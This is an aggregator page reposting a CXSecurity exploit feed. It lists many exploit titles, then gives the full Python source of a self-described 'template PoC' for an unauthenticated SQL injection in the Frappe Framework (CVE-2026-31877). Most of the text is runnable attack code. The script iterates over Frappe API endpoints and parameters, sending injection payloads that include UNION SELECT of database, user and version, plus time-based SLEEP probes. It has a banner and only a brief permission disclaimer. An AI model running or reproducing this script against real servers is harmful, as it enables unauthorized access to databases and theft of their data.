惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

J
Java Code Geeks
量子位
MongoDB | Blog
MongoDB | Blog
N
Netflix TechBlog - Medium
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
B
Blog
A
About on SuperTechFans
腾讯CDC
The GitHub Blog
The GitHub Blog
云风的 BLOG
云风的 BLOG
雷峰网
雷峰网
Last Week in AI
Last Week in AI
H
Help Net Security
WordPress大学
WordPress大学
博客园 - 司徒正美
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
H
Hackread – Cybersecurity News, Data Breaches, AI and More
T
Tailwind CSS Blog
博客园 - 【当耐特】
S
SegmentFault 最新的问题
美团技术团队
M
MIT News - Artificial intelligence
L
LangChain Blog
博客园 - 聂微东

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution
Frappe Framework <14.99.0 and <15.84.0 Unauthenticated SQ...
2026-03-14 · via CXSECURITY Database RSS Feed - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: Frappe Framework Unauthenticated SQL Injection # CVE: CVE-2026-31877 # Date: 2026-03-11 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://frappeframework.com # Software Link: https://github.com/frappe/frappe # Affected: Frappe Framework <14.99.0 and <15.84.0 # Tested on: Frappe Framework 15.x (vulnerable versions) # Category: Webapps # Platform: Linux / Web # Exploit Type: Remote SQL Injection # CVSS: 9.3 (CRITICAL) # CWE : CWE-89 # Description: Unauthenticated SQL injection via improper field sanitization in certain API endpoints allows extraction of sensitive database information. # Fixed in: 14.99.0 / 15.84.0 # Usage: python3 exploit.py <target> # # Examples: # python3 exploit.py http://192.168.1.100:8000 # # Options: # # Notes: This is a template PoC. The exact vulnerable parameter/endpoint remains undisclosed in the public advisory (GHSA-2c4m-999q-xhx4). # Tests common historical Frappe injection points. Use only on systems you own or have explicit permission to test. # # How to Use # # Step 1: Run against a vulnerable instance (non-production only) print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄ ▄. ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-31877 • Frappe SQL Injection (Unauthenticated) ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import sys import requests import time import argparse def test_sqli(base_url, endpoint, param, payload): full_url = f"{base_url.rstrip('/')}{endpoint}" data = {param: payload} print(f"[*] Testing {full_url} → {param} = {payload[:60]}...") try: start = time.time() r = requests.post(full_url, json=data, timeout=12, verify=False) elapsed = time.time() - start indicators = [ "syntax error", "mysql", "sql", "near", "you have an error", "ODBC", "quoted_string", "unclosed quotation", "table", "column", elapsed > 5 ] success = any(ind in r.text.lower() for ind in indicators[:10]) or elapsed > 5 if success: print(f"[!!!] Possible SQLi – response code {r.status_code}") print(f" Time: {elapsed:.2f}s") print(f" Snippet: {r.text[:400]}...") return True else: print(f" → No obvious injection (code {r.status_code}, len={len(r.text)})") return False except Exception as e: print(f" → Request failed: {e}") return False def main(target): common_endpoints = [ "/api/method/frappe.desk.reportview.get", "/api/method/frappe.model.db_query.get_list", "/api/method/frappe.client.get_list", "/api/method/frappe.desk.query_report.run", "/api/resource/User", "/api/method/frappe.search.search_link", "/api/method/frappe.desk.form.load.getdoc", ] common_params = [ "filters", "or_filters", "fields", "order_by", "group_by", "with_parent", "parent_doctype", "txt", ] payloads = [ "' OR '1'='1", "') OR ('1'='1", "' OR 1=1 -- ", "1' UNION SELECT database(),user(),version() -- ", "'; SELECT SLEEP(5) -- ", "1' AND SLEEP(5) -- ", ] print(f"[+] Target: {target}\n") found = False for ep in common_endpoints: for p in common_params: for payload in payloads: if test_sqli(target, ep, p, payload): print(f"[+] Possible vulnerable combination:") print(f" Endpoint: {ep}") print(f" Param: {p}") print(f" Payload: {payload}") found = True if not found: print("\n[-] No injection detected with these common patterns.") print(" → Either patched / not vulnerable, or different endpoint/param.") print(" → Wait for public details or analyze source diff yourself.") if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2026-31877 Frappe SQLi PoC template") parser.add_argument("target", help="Base URL, e.g. http://192.168.1.50:8000") args = parser.parse_args() if not args.target.startswith(("http://", "https://")): args.target = "http://" + args.target try: main(args.target) except KeyboardInterrupt: print("\n[!] Stopped by user.") except Exception as e: print(f"\n[!] Fatal error: {e}")